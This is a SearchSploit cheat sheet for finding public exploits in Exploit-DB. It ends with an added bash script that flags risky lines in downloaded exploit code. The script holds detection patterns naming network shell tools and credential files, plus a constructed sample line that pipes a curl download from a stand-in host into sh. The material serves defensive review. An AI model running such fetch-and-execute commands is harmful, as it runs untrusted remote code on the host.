SearchSploit Cheat Sheet
Command-line search of Exploit-DB for public exploits, shellcode, and papers by keyword or CVE.
Overview
SearchSploit queries a local copy of Exploit-DB archives. Use after service/version identification (Nmap, Nessus, manual) to find proof-of-concept exploits—then validate in lab and use only with authorization.
Authorized testing only. Running exploits against systems without permission is illegal. PoCs may be unreliable or destructive—test in isolated lab first.
Install
```bash
sudo apt install -y exploitdb
searchsploit -u   # update local database
searchsploit -h
```
Essential commands
Keyword search
```bash
searchsploit apache 2.4
```
Exact title match
```bash
searchsploit -t "WordPress 6.4"
```
CVE search
```bash
searchsploit CVE-2021-44228
```
Exclude terms
```bash
searchsploit linux kernel --exclude "(PoC)|dos"
```
Common workflows
Copy exploit to working directory —
```bash
searchsploit -m 50383
ls -la 50383.*
```
Examine without copying —
```bash
searchsploit -x 50383
```
JSON for scripting —
```bash
searchsploit apache tomcat --json | jq .
```
Mirror path and online lookup —
```bash
searchsploit -p 50383
```
Nmap version grep pipeline —
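```bash
# In -oG output each port is port/state/protocol/owner/service/rpc/version, so take
# the port and the version string from the Ports field, not whitespace columns.
grep -i "open" nmap.gnmap | grep -oE '[0-9]+/open/[^,]*' | awk -F/ '$7 != "" {print $1, $7}' |
while read -r port svc; do
    searchsploit "$svc" | head -5
done
```
Flags reference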
Flag | Description |
|---|---|
-u | Update Exploit-DB archive |
-m | Mirror exploit files to cwd |
-x | Examine exploit (pager) |
-p | Show full path |
-t | Title search only |
-e | EDITOR (examine) |
-j / --json | JSON output |
-w | Web links (exploit-db.com) |
-c | Case-sensitive |
--exclude | Exclude terms (` |
--cve | CVE-specific shorthand |
Tips
- Run searchsploit -u at engagement start; stale DB misses recent CVEs.
- -m copies code—review for backdoors, hardcoded IPs, and safety before execution.
- Cross-reference with vendor advisories and Metasploit search cve:.
- “DOS” exploits rarely add report value—filter with --exclude dos.
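One way to do the first-pass review from the `-m` tip above, as an added example that is not part of the original cheat sheet or the Exploit-DB project: a shell function that lists the lines to read first in a mirrored file. The pattern categories, the names `triage_exploit` and `make_sample`, and the sample file are assumptions constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: first-pass triage of a file copied with `searchsploit -m`.
# Prints "category:line:text" for each line to read before anything is run.
# Exit status: 0 = nothing flagged, 1 = at least one finding.
# Patterns are assumptions chosen for this example, not a complete list;
# an empty result does not replace reading the code.
triage_exploit() {
    awk '
    function flag(cat) { printf "%s:%d:%s\n", cat, NR, $0; hits++ }
    # Hardcoded IPv4 addresses: callback hosts or leftover lab targets.
    /(^|[^0-9.])[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+([^0-9.]|$)/ { flag("ip") }
    # Remote fetches and raw sockets that pull data in or send it out.
    /https?:\/\/|\/dev\/tcp\/|(curl|wget) / { flag("network") }
    # Encoded blobs and dynamic execution that hide what actually runs.
    /base64|eval[ (]|exec[ (]|os\.system|subprocess|popen/ { flag("exec") }
    # Changes to the machine the code is run from.
    /rm -rf|mkfs|dd if=|\/etc\/shadow|authorized_keys|crontab/ { flag("host-change") }
    END { exit (hits > 0) }
    ' "$1"
}

# Constructed sample (not a real Exploit-DB entry); 203.0.113.7 is a
# documentation-only TEST-NET address.
make_sample() {
    cat > "$1" <<'EOF'
#!/usr/bin/env python3
# Constructed sample, not a real Exploit-DB entry.
import os, sys
target = sys.argv[1]
callback = "203.0.113.7"
os.system("curl http://203.0.113.7/x.sh | sh")
print("checking", target)
EOF
}

# Usage: ./triage.sh 50383.py
if [ $# -gt 0 ]; then
    triage_exploit "$1"
fi
```

On the constructed sample this reports line 5 as `ip` and line 6 as `ip`, `network` and `exec`, and the non-zero exit status lets a wrapper script refuse to proceed until the file has been read.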